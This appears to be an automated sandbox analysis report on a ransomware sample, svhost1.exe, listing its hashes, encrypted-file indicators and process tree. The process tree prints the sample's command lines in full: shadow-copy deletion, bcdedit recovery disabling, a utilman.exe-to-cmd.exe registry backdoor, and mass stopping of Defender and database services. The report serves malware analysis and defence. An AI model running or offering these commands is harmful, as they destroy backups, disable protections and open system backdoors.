Analysis
-
max time kernel
45s -
max time network
52s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
09-05-2020 18:48
Static task
static1
Behavioral task
behavioral1
Sample
svhost1.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
svhost1.exe
Resource
win10v200430
General
-
Target
svhost1.exe
-
Size
2.8MB
-
MD5
0527539f8c9af38ea8c36e9d2be595cd
-
SHA1
a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
-
SHA256
247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
-
SHA512
00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4
Malware Config
Signatures
-
Runs net.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1616 vssadmin.exe -
Suspicious use of WriteProcessMemory 141 IoCs
Processes:
svhost1.exepowershell.exepowershell.exedescription pid process target process PID 1100 wrote to memory of 596 1100 svhost1.exe powershell.exe PID 1100 wrote to memory of 596 1100 svhost1.exe powershell.exe PID 1100 wrote to memory of 596 1100 svhost1.exe powershell.exe PID 596 wrote to memory of 660 596 powershell.exe net.exe PID 596 wrote to memory of 660 596 powershell.exe net.exe PID 596 wrote to memory of 660 596 powershell.exe net.exe PID 1100 wrote to memory of 984 1100 svhost1.exe powershell.exe PID 1100 wrote to memory of 984 1100 svhost1.exe powershell.exe PID 1100 wrote to memory of 984 1100 svhost1.exe powershell.exe PID 984 wrote to memory of 1068 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1068 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1068 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1616 984 powershell.exe vssadmin.exe PID 984 wrote to memory of 1616 984 powershell.exe vssadmin.exe PID 984 wrote to memory of 1616 984 powershell.exe vssadmin.exe PID 984 wrote to memory of 1608 984 powershell.exe reg.exe PID 984 wrote to memory of 1608 984 powershell.exe reg.exe PID 984 wrote to memory of 1608 984 powershell.exe reg.exe PID 984 wrote to memory of 1620 984 powershell.exe reg.exe PID 984 wrote to memory of 1620 984 powershell.exe reg.exe PID 984 wrote to memory of 1620 984 powershell.exe reg.exe PID 984 wrote to memory of 1704 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1704 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1704 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1892 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1892 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1892 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1840 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1840 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1840 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1916 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1916 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1916 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1264 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1264 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1264 984 powershell.exe WMIC.exe PID 984 wrote to memory of 540 984 powershell.exe WMIC.exe PID 984 wrote to memory of 540 984 powershell.exe WMIC.exe PID 984 wrote to memory of 540 984 powershell.exe WMIC.exe PID 984 wrote to memory of 2036 984 powershell.exe WMIC.exe PID 984 wrote to memory of 2036 984 powershell.exe WMIC.exe PID 984 wrote to memory of 2036 984 powershell.exe WMIC.exe PID 984 wrote to memory of 2012 984 powershell.exe WMIC.exe PID 984 wrote to memory of 2012 984 powershell.exe WMIC.exe PID 984 wrote to memory of 2012 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1452 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1452 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1452 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1480 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1480 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1480 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1308 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1308 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1308 984 powershell.exe WMIC.exe PID 984 wrote to memory of 276 984 powershell.exe WMIC.exe PID 984 wrote to memory of 276 984 powershell.exe WMIC.exe PID 984 wrote to memory of 276 984 powershell.exe WMIC.exe PID 984 wrote to memory of 432 984 powershell.exe WMIC.exe PID 984 wrote to memory of 432 984 powershell.exe WMIC.exe PID 984 wrote to memory of 432 984 powershell.exe WMIC.exe PID 984 wrote to memory of 216 984 powershell.exe WMIC.exe PID 984 wrote to memory of 216 984 powershell.exe WMIC.exe PID 984 wrote to memory of 216 984 powershell.exe WMIC.exe PID 984 wrote to memory of 1500 984 powershell.exe WMIC.exe -
Suspicious use of AdjustPrivilegeToken 1565 IoCs
Processes:
powershell.exepowershell.exeWMIC.exevssvc.exeWMIC.exedescription pid process Token: SeDebugPrivilege 596 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeIncreaseQuotaPrivilege 1068 WMIC.exe Token: SeSecurityPrivilege 1068 WMIC.exe Token: SeTakeOwnershipPrivilege 1068 WMIC.exe Token: SeLoadDriverPrivilege 1068 WMIC.exe Token: SeSystemProfilePrivilege 1068 WMIC.exe Token: SeSystemtimePrivilege 1068 WMIC.exe Token: SeProfSingleProcessPrivilege 1068 WMIC.exe Token: SeIncBasePriorityPrivilege 1068 WMIC.exe Token: SeCreatePagefilePrivilege 1068 WMIC.exe Token: SeBackupPrivilege 1068 WMIC.exe Token: SeRestorePrivilege 1068 WMIC.exe Token: SeShutdownPrivilege 1068 WMIC.exe Token: SeDebugPrivilege 1068 WMIC.exe Token: SeSystemEnvironmentPrivilege 1068 WMIC.exe Token: SeRemoteShutdownPrivilege 1068 WMIC.exe Token: SeUndockPrivilege 1068 WMIC.exe Token: SeManageVolumePrivilege 1068 WMIC.exe Token: 33 1068 WMIC.exe Token: 34 1068 WMIC.exe Token: 35 1068 WMIC.exe Token: SeIncreaseQuotaPrivilege 1068 WMIC.exe Token: SeSecurityPrivilege 1068 WMIC.exe Token: SeTakeOwnershipPrivilege 1068 WMIC.exe Token: SeLoadDriverPrivilege 1068 WMIC.exe Token: SeSystemProfilePrivilege 1068 WMIC.exe Token: SeSystemtimePrivilege 1068 WMIC.exe Token: SeProfSingleProcessPrivilege 1068 WMIC.exe Token: SeIncBasePriorityPrivilege 1068 WMIC.exe Token: SeCreatePagefilePrivilege 1068 WMIC.exe Token: SeBackupPrivilege 1068 WMIC.exe Token: SeRestorePrivilege 1068 WMIC.exe Token: SeShutdownPrivilege 1068 WMIC.exe Token: SeDebugPrivilege 1068 WMIC.exe Token: SeSystemEnvironmentPrivilege 1068 WMIC.exe Token: SeRemoteShutdownPrivilege 1068 WMIC.exe Token: SeUndockPrivilege 1068 WMIC.exe Token: SeManageVolumePrivilege 1068 WMIC.exe Token: 33 1068 WMIC.exe Token: 34 1068 WMIC.exe Token: 35 1068 WMIC.exe Token: SeBackupPrivilege 1784 vssvc.exe Token: SeRestorePrivilege 1784 vssvc.exe Token: SeAuditPrivilege 1784 vssvc.exe Token: SeIncreaseQuotaPrivilege 1704 WMIC.exe Token: SeSecurityPrivilege 1704 WMIC.exe Token: SeTakeOwnershipPrivilege 1704 WMIC.exe Token: SeLoadDriverPrivilege 1704 WMIC.exe Token: SeSystemProfilePrivilege 1704 WMIC.exe Token: SeSystemtimePrivilege 1704 WMIC.exe Token: SeProfSingleProcessPrivilege 1704 WMIC.exe Token: SeIncBasePriorityPrivilege 1704 WMIC.exe Token: SeCreatePagefilePrivilege 1704 WMIC.exe Token: SeBackupPrivilege 1704 WMIC.exe Token: SeRestorePrivilege 1704 WMIC.exe Token: SeShutdownPrivilege 1704 WMIC.exe Token: SeDebugPrivilege 1704 WMIC.exe Token: SeSystemEnvironmentPrivilege 1704 WMIC.exe Token: SeRemoteShutdownPrivilege 1704 WMIC.exe Token: SeUndockPrivilege 1704 WMIC.exe Token: SeManageVolumePrivilege 1704 WMIC.exe Token: 33 1704 WMIC.exe Token: 34 1704 WMIC.exe -
Drops file in Program Files directory 100 IoCs
Processes:
svhost1.exedescription ioc process File opened for modification C:\Program Files\desktop.ini svhost1.exe File created C:\Program Files\UnprotectCompare.ppsx_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\F12Resources.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\iedvtool.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\msdbg2.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\D3DCompiler_47.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ielowutil.exe svhost1.exe File opened for modification C:\Program Files\Internet Explorer\IEShims.dll svhost1.exe File created C:\Program Files\Internet Explorer\JSProfilerCore.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\InstallBackup.cab svhost1.exe File created C:\Program Files\UnpublishRestore.xps_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\iedvtool.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\JSProfilerCore.dll svhost1.exe File created C:\Program Files\Internet Explorer\perfcore.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\7-Zip\7z.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\BlockImport.xhtml svhost1.exe File created C:\Program Files\NewRevoke.bin_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\pdmproxy100.dll svhost1.exe File created C:\Program Files\Internet Explorer\Timeline.cpu.xml_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\Timeline.cpu.xml svhost1.exe File opened for modification C:\Program Files\Internet Explorer\Timeline_is.dll svhost1.exe File created C:\Program Files\Internet Explorer\msdbg2.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\ConvertFromCheckpoint.js svhost1.exe File opened for modification C:\Program Files\MergeSet.xlsx svhost1.exe File created C:\Program Files\Internet Explorer\ieinstal.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\IEShims.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\jsprofilerui.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\jsprofilerui.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\F12Resources.dll svhost1.exe File created C:\Program Files\Internet Explorer\networkinspection.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\Timeline.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\7-Zip\7-zip.chm_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\7-Zip\7-zip32.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\OutRequest.ini_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\RequestImport.cmd_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\ResetAssert.vssx svhost1.exe File created C:\Program Files\WatchOut.clr_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\WatchOut.clr svhost1.exe File opened for modification C:\Program Files\Internet Explorer\pdm.dll svhost1.exe File opened for modification C:\Program Files\7-Zip\7-zip.dll svhost1.exe File created C:\Program Files\Internet Explorer\sqmapi.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\OutRequest.ini svhost1.exe File opened for modification C:\Program Files\UseInvoke.xltm svhost1.exe File opened for modification C:\Program Files (x86)\desktop.ini svhost1.exe File opened for modification C:\Program Files\Internet Explorer\DiagnosticsHub_is.dll svhost1.exe File created C:\Program Files\Internet Explorer\iediagcmd.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\iediagcmd.exe svhost1.exe File created C:\Program Files\Internet Explorer\MemoryAnalyzer.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\ConvertFromCheckpoint.js_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\UseInvoke.xltm_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ieproxy.dll svhost1.exe File opened for modification C:\Program Files\UnpublishRestore.xps svhost1.exe File created C:\Program Files\Internet Explorer\jsdbgui.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\perf_nt.dll svhost1.exe File created C:\Program Files\Internet Explorer\Timeline_is.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\BlockImport.xhtml_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\desktop.ini_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\RequestImport.cmd svhost1.exe File created C:\Program Files\WaitConnect.xps_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\F12.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ie9props.propdesc svhost1.exe -
Drops file in Windows directory 56 IoCs
Processes:
svhost1.exedescription ioc process File created C:\Windows\mib.bin_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\system.ini svhost1.exe File opened for modification C:\Windows\winhlp32.exe svhost1.exe File created C:\Windows\DtcInstall.log_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\notepad.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\bfsvc.exe svhost1.exe File created C:\Windows\write.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\msdfmap.ini svhost1.exe File created C:\Windows\regedit.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\win.ini svhost1.exe File opened for modification C:\Windows\WindowsUpdate.log svhost1.exe File created C:\Windows\bfsvc.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\HelpPane.exe svhost1.exe File created C:\Windows\WMSysPr9.prx_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\twain_32.dll svhost1.exe File created C:\Windows\splwow64.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\twain.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\twunk_32.exe svhost1.exe File opened for modification C:\Windows\Starter.xml svhost1.exe File created C:\Windows\explorer.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\Professional.xml svhost1.exe File opened for modification C:\Windows\write.exe svhost1.exe File opened for modification C:\Windows\DtcInstall.log svhost1.exe File opened for modification C:\Windows\hh.exe svhost1.exe File opened for modification C:\Windows\TSSysprep.log svhost1.exe File opened for modification C:\Windows\WMSysPr9.prx svhost1.exe File created C:\Windows\system.ini_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\twain.dll svhost1.exe File created C:\Windows\twain_32.dll_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\twunk_16.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\winhlp32.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\bootstat.dat_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\Professional.xml_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\splwow64.exe svhost1.exe File created C:\Windows\WindowsShell.Manifest_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\WindowsShell.Manifest svhost1.exe File opened for modification C:\Windows\bootstat.dat svhost1.exe File created C:\Windows\fveupdate.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\setupact.log svhost1.exe File created C:\Windows\win.ini_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\PFRO.log svhost1.exe File opened for modification C:\Windows\regedit.exe svhost1.exe File created C:\Windows\setupact.log_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\hh.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\PFRO.log_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\TSSysprep.log_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\twunk_16.exe svhost1.exe File created C:\Windows\twunk_32.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\WindowsUpdate.log_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\explorer.exe svhost1.exe File created C:\Windows\msdfmap.ini_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\Starter.xml_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\mib.bin svhost1.exe File opened for modification C:\Windows\notepad.exe svhost1.exe File opened for modification C:\Windows\fveupdate.exe svhost1.exe File created C:\Windows\HelpPane.exe_ID_2876361323_[decryption@qbmail.biz].trix svhost1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 596 powershell.exe 984 powershell.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2024 bcdedit.exe 1968 bcdedit.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Drops desktop.ini file(s) 3 IoCs
Processes:
svhost1.exedescription ioc process File opened for modification C:\Program Files\desktop.ini svhost1.exe File opened for modification C:\Program Files (x86)\desktop.ini svhost1.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-910373003-3952921535-3480519689-1000\desktop.ini svhost1.exe -
Sets file execution options in registry 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe" reg.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\svhost1.exe"C:\Users\Admin\AppData\Local\Temp\svhost1.exe"1⤵
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Drops file in Windows directory
- Drops desktop.ini file(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -Command -2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" view3⤵
- Discovers systems in the same network
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -Command -2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe3⤵
- Sets file execution options in registry
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"3⤵
- Sets file execution options in registry
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate3⤵
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service